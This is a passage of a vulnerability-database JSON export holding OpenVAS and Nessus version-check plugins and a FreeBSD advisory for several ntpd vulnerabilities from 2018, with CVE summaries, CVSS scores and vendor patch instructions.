value:\"http://support.ntp.org/bin/view/Main/NtpBug3454\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to a denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"The flaw exist due to a bug that was\n inadvertently introduced into the 'protocol engine' that allows a non-authenticated\n zero-origin (reset) packet to reset an authenticated interleaved peer association.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial-of-service condition, denying service to legitimate\n users.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd versions 4.2.6 through 4.2.8p10 and before 4.2.8p11.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP.org's ntpd version 4.2.8p11 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\") {\n if((revcomp(a:version, b:\"4.2.6\") >= 0) && (revcomp(a:version, b:\"4.2.8p11\") < 0)) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"4.2.8p11\", install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-17T16:58:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8936", "CVE-2018-7184", "CVE-2015-5146", "CVE-2015-7973", "CVE-2015-7704", "CVE-2018-7183"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-04-16T00:00:00", "published": "2020-04-16T00:00:00", "id": "OPENVAS:1361412562311220201457", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201457", "type": "openvas", "title": "Huawei EulerOS: Security 
Advisory for ntp (EulerOS-SA-2020-1457)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from the referenced\n# advisories, and are Copyright (C) by the respective right holder(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1457\");\n script_version(\"2020-04-16T05:55:39+0000\");\n script_cve_id(\"CVE-2015-5146\", \"CVE-2015-7973\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2019-8936\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-16 05:55:39 +0000 (Thu, 16 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-16 05:55:39 +0000 (Thu, 16 Apr 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1457)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.2\\.2\");\n\n 
script_xref(name:\"EulerOS-SA\", value:\"2020-1457\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1457\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1457 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"NTP through 4.2.8p12 has a NULL Pointer Dereference.(CVE-2019-8936)\n\nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the 'received' timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.(CVE-2018-7184)\n\nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.(CVE-2018-7183)\n\nNTP before 4.2.8p6 and 4.3.x before 4.3.90, when configured in broadcast mode, allows man-in-the-middle attackers to conduct replay attacks by sniffing the network.(CVE-2015-7973)\n\nntpd in ntp before 4.2.8p3 with remote configuration enabled allows remote authenticated users with knowledge of the configuration password and access to a computer entrusted to perform remote configuration to cause a denial of service (service crash) via a NULL byte in a crafted configuration directive packet.(CVE-2015-5146)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization 3.0.2.2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.2.2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.2.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.2.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.2.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812791", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812791", "type": "openvas", "title": "NTP.org 'ntpd' 'received' Timestamp Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP 'received' Timestamp Denial of Service Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812791\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7184\");\n script_bugtraq_id(103192);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 11:57:40 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' 'received' Timestamp Denial of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3453\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to a denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because ntpd in ntp drops\n bad packets before updating the 'received' timestamp.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial-of-service condition, denying service to legitimate\n users.\");\n\n script_tag(name:\"affected\", 
value:\"NTP.org's ntpd versions from 4.2.8p4 and before 4.2.8p11.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP.org's ntpd version 4.2.8p11\n or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\\.8\") {\n if((revcomp(a:version, b:\"4.2.8p4\") >= 0) && (revcomp(a:version, b:\"4.2.8p11\") < 0)) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"4.2.8p11\", install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:59", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "\nNetwork Time Foundation reports:\n\nThe NTP Project at Network Time Foundation is releasing ntp-4.2.8p11.\nThis release addresses five security issues in ntpd:\n\nLOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil\n\t vulnerability: ephemeral association attack\nINFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909:\n\t ctl_getitem(): buffer read overrun leads to undefined\n\t behavior and information leak\nLOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple\n\t authenticated ephemeral associations\nLOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved\n\t symmetric mode cannot recover from bad state\nLOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909:\n\t Unauthenticated packet can reset authenticated interleaved\n\t association\n\none security 
issue in ntpq:\n\nMEDIUM: Sec 3414 / CVE-2018-7183 / VU#961909:\n\t ntpq:decodearr() can write beyond its buffer limit\n\nand provides over 33 bugfixes and 32 other improvements.\n\n", "edition": 6, "modified": "2018-03-14T00:00:00", "published": "2018-02-27T00:00:00", "id": "AF485EF4-1C58-11E8-8477-D05099C0AE8C", "href": "https://vuxml.freebsd.org/freebsd/af485ef4-1c58-11e8-8477-d05099c0ae8c.html", "title": "ntp -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-20T14:51:35", "description": "This update for ntp fixes the following issues: Security issues \nfixed :\n\n - CVE-2016-1549: Significant additional protections\n against CVE-2016-1549 that was fixed in ntp-4.2.8p7\n (bsc#1082210).\n\n - CVE-2018-7170: Ephemeral association time spoofing\n additional protection (bsc#1083424).\n\n - CVE-2018-7182: Buffer read overrun leads information\n leak in ctl_getitem() (bsc#1083426).\n\n - CVE-2018-7183: decodearr() can write beyond its buffer\n limit (bsc#1083417).\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state (bsc#1083422).\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association (bsc#1083420). Bug\n fixes :\n\n - bsc#1077445: Don't use libevent's cached time stamps in\n sntp.\n\n - Disable CMAC in ntp when building against a version of\n OpenSSL that doesn't support it.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-27T00:00:00", "title": "SUSE SLES11 Security Update : ntp (SUSE-SU-2018:0808-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2018-03-27T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ntp-doc", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-0808-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108651", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0808-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108651);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLES11 Security Update : ntp (SUSE-SU-2018:0808-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues: Security issues \nfixed :\n\n - CVE-2016-1549: Significant additional protections\n against CVE-2016-1549 that was fixed in ntp-4.2.8p7\n (bsc#1082210).\n\n - CVE-2018-7170: Ephemeral association time spoofing\n additional protection (bsc#1083424).\n\n - CVE-2018-7182: 
Buffer read overrun leads information\n leak in ctl_getitem() (bsc#1083426).\n\n - CVE-2018-7183: decodearr() can write beyond its buffer\n limit (bsc#1083417).\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state (bsc#1083422).\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association (bsc#1083420). Bug\n fixes :\n\n - bsc#1077445: Don't use libevent's cached time stamps in\n sntp.\n\n - Disable CMAC in ntp when building against a version of\n OpenSSL that doesn't support it.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180808-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c386533\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-ntp-13534=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-ntp-13534=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/27\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-4.2.8p11-64.4.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-doc-4.2.8p11-64.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:37:02", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. 
(bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-18T00:00:00", "title": "openSUSE Security Update : ntp (openSUSE-2018-376)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:ntp"], "id": "OPENSUSE-2018-376.NASL", "href": "https://www.tenable.com/plugins/nessus/109102", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-376.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109102);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"openSUSE Security Update : ntp (openSUSE-2018-376)\");\n script_summary(english:\"Check for the openSUSE-2018-376 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n 
association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ntp-4.2.8p11-31.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ntp-debuginfo-4.2.8p11-31.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ntp-debugsource-4.2.8p11-31.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-debuginfo / ntp-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": 